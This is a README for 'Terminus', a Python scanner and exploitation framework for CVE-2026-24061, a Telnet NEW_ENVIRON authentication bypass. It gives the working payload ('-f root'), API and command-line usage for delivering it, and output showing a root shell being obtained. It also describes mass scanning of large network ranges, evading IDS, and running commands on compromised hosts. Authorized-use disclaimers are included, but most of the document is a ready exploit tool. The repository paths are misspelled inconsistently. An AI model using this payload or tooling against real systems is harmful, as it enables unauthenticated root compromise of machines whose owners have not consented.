A security analysis engine for CVE-2026-24061 Telnet NEW_ENVIRON authentication bypass and privilege escalation vulnerability.
Terminus is a professional security research tool designed for authorized penetration testing and vulnerability assessment of CVE-2026-24061. This critical vulnerability affects legacy Telnet daemon implementations, allowing unauthenticated remote attackers to bypass authentication and gain root-level access.
CVE-2026-24061 is a Remote Code Execution vulnerability in Telnet services that support RFC 1572 (Telnet Environment Option). The vulnerability exploits improper sanitization of the USER environment variable during NEW_ENVIRON subnegotiation:
- Normal authentication:
USER=john→ prompts for password - Exploit payload:
USER=-f root→ bypasses authentication, grants root shell
Impact:
- Complete authentication bypass (no password required)
- Immediate privilege escalation to root
- Full system compromise
Affected Services:
- Legacy Telnet GNU Inetutils telnetd (specifically versions through 2.7)
- IoT firmware with vulnerable Telnet implementations
- Industrial control systems with outdated Telnet services
- High-Concurrency Scanning: Scan 1,000+ targets concurrently using AsyncIO
- CIDR Support: Scan entire network ranges (
192.168.0.0/24,10.0.0.0/8) - Dual Detection Modes:
- Passive (default): Fast, safe, signature-based detection
- Active Verification (
--verify): Proof-of-exploit, confirms uid=0 root access
- Banner Analysis: Fingerprint daemon types and versions
- Risk Scoring: Multi-layered confidence assessment (CRITICAL, HIGH, MEDIUM, LOW)
- TerminusNegotiator Class: Clean API for Telnet protocol operations
Terminus.handshake()- RFC 854 compliant handshakeTerminus.exploit()- CVE-2026-24061 payload delivery
- Proper Option Negotiation: Avoids IDS/IPS detection through protocol compliance
- State Machine: Robust handling of IAC sequences (DO/DONT/WILL/WONT/SB/SE)
- Interactive Shell: Full post-exploitation shell with root access
- Command Execution: Execute single commands and capture output
- Evidence Collection: Gather uid, environment variables, system info
- Safety Mechanisms:
- Requires explicit
--exploitflag - Disabled in batch scanning mode
- Audit logging of all exploitation attempts
- Requires explicit
- Terminal: Rich-formatted tables with color-coded risk levels
- JSON: SIEM/SOAR integration
- CSV: Spreadsheet tracking
- HTML: Detailed reports with statistics
- Markdown: Documentation-friendly output
The heart of Terminus is the TerminusNegotiator class, which provides a clean separation between protocol handling and exploitation logic:
from terminus import TerminusNegotiator
# Initialize engine
negotiator = TerminusNegotiator()
# Step 1: RFC 854 compliant handshake
await negotiator.handshake(target="192.168.1.100", port=23)
# Step 2: Deliver CVE-2026-24061 payload
result = await negotiator.exploit(payload="-f root")
if result.success:
print(f"Root shell acquired: {result.evidence['uid']}")Traditional scripts (existing tools):
Target → Raw Socket → Payload → Blind Execution → Hope for Shell
Terminus engine:
Target → Discovery → RFC Handshake → Passive Analysis → Risk Assessment
↓
[Optional] Verified Exploitation → Evidence Collection → Report
- Python 3.10+
- Supported Platforms:
- Windows 10/11 (PowerShell)
- Windows + WSL2 (Kali Linux, Parrot OS, Ubuntu)
- Native Linux (Kali, Parrot, Ubuntu, Debian)
- macOS (with Python 3.10+)
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
# Run setup script
.\setup_env.ps1
# Activate virtual environment
.venv\Scripts\Activate.ps1
# Verify installation
terminus --version# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
cd Terminus-CVE-2025-2406
# Run setup script
chmod +x setup_env.sh
./setup_env.sh
# Activate virtual environment
source venv/bin/activate
# Verify installation
terminus --version# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
cd Terrminus-CVE-2026-2406
# Create virtual environment
python3 -m venv venv
# Activate (Linux/macOS/WSL)
source venv/bin/activate
# Activate (Windows PowerShell)
# venv\Scripts\Activate.ps1
# Install dependencies
pip install -e .
# Verify
terminus --versiontelnetlib3- AsyncIO Telnet protocol implementationrich- Terminal UI and formatting (ANSI support on Windows/Linux)pydantic- Data validation and modelsaiofiles- Async file I/Ojinja2- Report templatingpyyaml- Configuration managementpathlib- Cross-platform path handling (built-in)
Note: All dependencies are pure Python or have cross-platform wheels. No platform-specific compilation required.
Enable tab completion for faster command entry:
_TERMINUS_COMPLETE=bash_source terminus > ~/.terminus-complete.bash
echo 'source ~/.terminus-complete.bash' >> ~/.bashrc
source ~/.bashrc_TERMINUS_COMPLETE=zsh_source terminus > ~/.terminus-complete.zsh
echo 'source ~/.terminus-complete.zsh' >> ~/.zshrc
source ~/.zshrc_TERMINUS_COMPLETE=fish_source terminus > ~/.config/fish/completions/terminus.fish# Add to $PROFILE
_TERMINUS_COMPLETE=powershell_source terminus | Out-String | Invoke-ExpressionTest it:
terminus <TAB> # Shows: scan, exploit, version
terminus scan -<TAB> # Shows: -t, -f, -p, --verify, etc.terminus scan -t 192.168.1.100terminus scan -t 192.168.1.0/24# targets.txt contains one IP/CIDR per line
terminus scan -f targets.txt --threads 500terminus scan -t 10.0.0.0/8 --threads 1000 --rate-limit 200terminus scan -t target.com --passive-onlyterminus scan -t target.com --aggressiveterminus scan -t 192.168.1.100 --verifyCheck version:
PS C:\terminus> terminus --version
Terminus v1.0.0
CVE-2026-24061 Telnet NEW_ENVIRON Scanner & Exploitation Framework
Signatures database: C:\terminus\signatures.dbPassive scan (default - conservative risk assessment):
PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323
================================================================
TERMINUS
CVE-2026-24061 Scanner & Exploitation Framework
================================================================
Parsing 1 targets...
Found 1 valid targets
Scanning 1 targets... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% (1/1) Vulnerable: 0 0:00:00
╭────── Scan Summary ──────╮
│ CVE: CVE-2026-24061 │
│ Total Targets: 1 │
│ Scanned: 1 │
│ Failed: 0 │
│ Timeouts: 0 │
│ │
│ Vulnerability Breakdown: │
│ Critical: 0 │
│ High: 0 │
│ Medium: 0 │
│ Low: 1 │
│ Info: 0 │
│ │
│ Duration: 3.53s │
│ Avg Scan Time: 3522.22ms │
│ │
╰──────────────────────────╯
Terminus - CVE-2026-24061 Scan Results
╭───────────────┬──────┬───────────┬──────┬─────────┬─────────┬─────────────┬──────────┬───────────────╮
│ Target │ Port │ Status │ Risk │ Daemon │ Version │ NEW_ENVIRON │ Verified │ Duration (ms) │
├───────────────┼──────┼───────────┼──────┼─────────┼─────────┼─────────────┼──────────┼───────────────┤
│ 172.17.45.122 │ 2323 │ completed │ Low │ unknown │ Unknown │ YES │ - │ 3522.22 │
╰───────────────┴──────┴───────────┴──────┴─────────┴─────────┴─────────────┴──────────┴───────────────╯
No vulnerable targets foundActive verification with --verify (proof-of-exploit):
PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323 --verify
================================================================
TERMINUS
CVE-2026-24061 Scanner & Exploitation Framework
================================================================
Parsing 1 targets...
Found 1 valid targets
Scanning 1 targets... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% (1/1) Vulnerable: 1 0:00:00
╭────── Scan Summary ──────╮
│ CVE: CVE-2026-24061 │
│ Total Targets: 1 │
│ Scanned: 1 │
│ Failed: 0 │
│ Timeouts: 0 │
│ │
│ Vulnerability Breakdown: │
│ Critical: 1 │
│ High: 0 │
│ Medium: 0 │
│ Low: 0 │
│ Info: 0 │
│ │
│ Duration: 8.04s │
│ Avg Scan Time: 8029.55ms │
│ │
╰──────────────────────────╯
Terminus - CVE-2026-24061 Scan Results
╭───────────────┬──────┬───────────┬──────────┬─────────┬─────────┬─────────────┬──────────┬───────────────╮
│ Target │ Port │ Status │ Risk │ Daemon │ Version │ NEW_ENVIRON │ Verified │ Duration (ms) │
├───────────────┼──────┼───────────┼──────────┼─────────┼─────────┼─────────────┼──────────┼───────────────┤
│ 172.17.45.122 │ 2323 │ completed │ Critical │ unknown │ Unknown │ YES │ ROOT │ 8029.55 │
╰───────────────┴──────┴───────────┴──────────┴─────────┴─────────┴─────────────┴──────────┴───────────────╯
Found 1 vulnerable targets!Interactive exploitation:
PS C:terminus> python -m terminus exploit -t 172.17.45.122 -p 2323 --yes
================================================================
TERMINUS
CVE-2026-24061 Scanner & Exploitation Framework
================================================================
Attempting exploitation of 172.17.45.122:2323...
Payload: -f root
CVE-2026-24061 exploitation attempt initiated with payload: -f root
CVE-2026-24061 exploitation SUCCESSFUL - root access obtained
[*] CVE-2026-24061 Interactive Shell Started
[*] Type 'exit' or press Ctrl+C to quit
whoami
root
┌──[root@parrot]─[~]
└──╼ #Key observations:
- Passive mode: Detected NEW_ENVIRON support but reported LOW risk (conservative)
- Active verification: Confirmed root access (uid=0), escalated to CRITICAL risk with "ROOT" verification status
- Exploitation: Immediate root shell without password prompt
What it does:
- Performs passive detection first (banner + protocol analysis)
- If vulnerability suspected, attempts actual exploitation with
-f rootpayload - Confirms root access by checking
uid=0in response - Escalates risk to CRITICAL when root access confirmed
- Outputs verification status in scan results
Use cases:
- High-confidence validation for compliance reports
- Proof-of-concept demonstrations
- Confirming exploitability before reporting to vendors
- Red team operations requiring evidence collection
Example output:
Target Port Status Daemon Risk Verified
192.168.1.100 23 VULNERABLE inetutils-telnetd CRITICAL ROOT ACCESS
192.168.1.101 23 VULNERABLE netkit-telnetd HIGH Not tested
192.168.1.102 23 SAFE OpenBSD-telnetd LOW N/A
Batch verification:
terminus scan -f targets.txt --verify -o json -w verified_results.jsonNote: Active verification attempts exploitation. Only use with proper authorization.
terminus scan -t 192.168.1.0/24 -o json > results.jsonterminus scan -f targets.txt -o html -w report.htmlterminus scan -t 10.0.0.0/24 -o csv > vulnerabilities.csvterminus exploit -t 192.168.1.100
# Requires confirmation prompt
# Grants root shell on vulnerable targetterminus exploit -t 192.168.1.100 -c "id"
# Output: uid=0(root) gid=0(root) groups=0(root)terminus exploit -t 192.168.1.100 --payload "-f admin"terminus update-signaturesterminus verify -f results.jsonterminus versionTerminus is designed for portable deployment - copy the directory to any Windows/Linux system and run without installation:
# Copy terminus directory to target system
# No hardcoded paths - everything is relative
# Run directly (no installation needed)
cd terminus
python3 -m terminus scan -t 192.168.1.0/24
# All output stays in project directory:
# - Logs: ./logs/terminus.log
# - Reports: ./reports/
# - Config: ./config.yamlRecommended for Windows Red Team workstations - isolated Linux environment for deploying vulnerable test services:
# Windows PowerShell (Admin)
# Install WSL2
wsl --install
# Install Kali Linux
wsl --install -d kali-linux
# OR Install Parrot OS (if available)
# wsl --install -d ParrotOS
# Verify
wsl -l -v# Update system
sudo apt update && sudo apt upgrade -y
# Install Terminus dependencies
sudo apt install python3 python3-pip python3-venv
# Install testing tools
sudo apt install netkit-telnetd telnetd wireshark tcpdump
# Clone and setup Terminus
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406
cd Terminusb-CVE-2026-2406
./setup_env.sh
source venv/bin/activateWARNING: Only in isolated lab environments. Never on production systems.
# Inside WSL2
# Install vulnerable netkit-telnetd version
sudo apt install netkit-telnetd=0.17-*
# Configure for NEW_ENVIRON support
# Edit /etc/inetd.conf to enable telnet
# Start service
sudo systemctl restart inetd
# Test from Windows host
# From PowerShell:
# terminus scan -t $(wsl hostname -I)Test Terminus on all platforms used by your Red Team:
| Platform | Installation | Scanning | Exploitation |
|---|---|---|---|
| Windows 10/11 (PowerShell) | Yes | Yes | Yes |
| WSL2 - Kali Linux | Yes | Yes | Yes |
| WSL2 - Parrot OS | Yes | Yes | Yes |
| WSL2 - Ubuntu | Yes | Yes | Yes |
| Native Kali Linux | Yes | Yes | Yes |
| Native Parrot OS | Yes | Yes | Yes |
| macOS | Yes | Yes | Yes |
import asyncio
from terminus import TerminusScanner, TerminusExploiter, TerminusNegotiator
from terminus.reporting.models import RiskScore
async def scan_network():
# High-level scanner
async with TerminusScanner() as scanner:
async for result in scanner.scan_targets(["192.168.1.0/24"]):
if result.risk_score == RiskScore.CRITICAL:
print(f"CRITICAL: {result.target}")
print(f" Daemon: {result.daemon_type} {result.version}")
print(f" Confidence: {result.vulnerability_confidence:.2%}")
async def exploit_target():
# Direct engine usage
negotiator = TerminusNegotiator()
# Handshake
success = await negotiator.handshake(target="192.168.1.100", port=23)
if not success:
print("Handshake failed")
return
# Exploit
result = await negotiator.exploit(payload="-f root")
if result.success:
print(f"Root access obtained")
print(f"Evidence: {result.evidence}")
# Run
asyncio.run(scan_network())This tool is intended ONLY for:
- Authorized penetration testing engagements
- Security research in controlled environments
- CTF competitions and educational labs
- Defensive security assessments with written permission
Unauthorized use is ILLEGAL and unethical.
- Authorization Required: Exploitation requires explicit
--exploitflag - Confirmation Prompts: Interactive confirmation before exploitation
- Audit Logging: All exploitation attempts logged with timestamps
- Single-Target Enforcement: Exploitation disabled in batch scan mode
- Rate Limiting: Prevents accidental DoS during scanning
If you discover vulnerable systems using Terminus:
- DO NOT exploit systems without written authorization
- Report findings to system owners through responsible disclosure
- Document findings using Terminus reporting features
- Follow coordinated vulnerability disclosure guidelines
- CVE ID: CVE-2026-24061
- Severity: CRITICAL (CVSS 9.8)
- Vector: Network, Unauthenticated, Low Complexity
- Primary Research: SafeBreach-Labs CVE-2026-24061
- Reference Exploit: telnet_rce.py
- Batch Scanner: TryA9ain CVE-2026-24061
- RFC 854: Telnet Protocol Specification
- RFC 1572: Telnet Environment Option
- 90%+ code coverage with pytest
- Unit tests for all core modules
- Integration tests with mock Telnet server
- Performance benchmarks (1,000 targets < 60 seconds)
- Scan vulnerable service (verify detection)
- Scan patched service (verify no false positive)
- Test authentication bypass (no password prompt)
- Verify privilege escalation (uid=0)
- Monitor IDS alerts (verify stealth)
- Performance test (1,000+ targets)
All paths are relative to project root - works on Windows, Linux, and WSL without modification:
# config.yaml - Cross-platform configuration
# All paths relative to project directory
scanner:
default_port: 23
connect_timeout: 3.0
handshake_timeout: 5.0
max_concurrent: 1000
rate_limit: 100 # connections/second
detection:
passive_only: true # Safe mode by default
banner_timeout: 2.0
heuristic_checks: true
# Signature database (relative path)
signatures_db: "./signatures.db"
exploit:
require_authorization: true
default_payload: "-f root"
evidence_collection: true
interactive_shell: true
reporting:
default_format: "terminal"
include_safe_targets: false
verbosity: "normal"
# Output directory (relative path - works on Windows/Linux)
output_dir: "./reports"
logging:
level: "INFO"
# Log file (relative path - automatic directory creation)
file: "./logs/terminus.log"
format: "json"
console_enabled: true
---
## Acknowledgments
- **SafeBreach Labs:** Original CVE-2026-24061 research and exploit implementation
- **TryA9ain:** Batch scanning approach inspiration
- **RFC Authors:** Telnet protocol specifications
---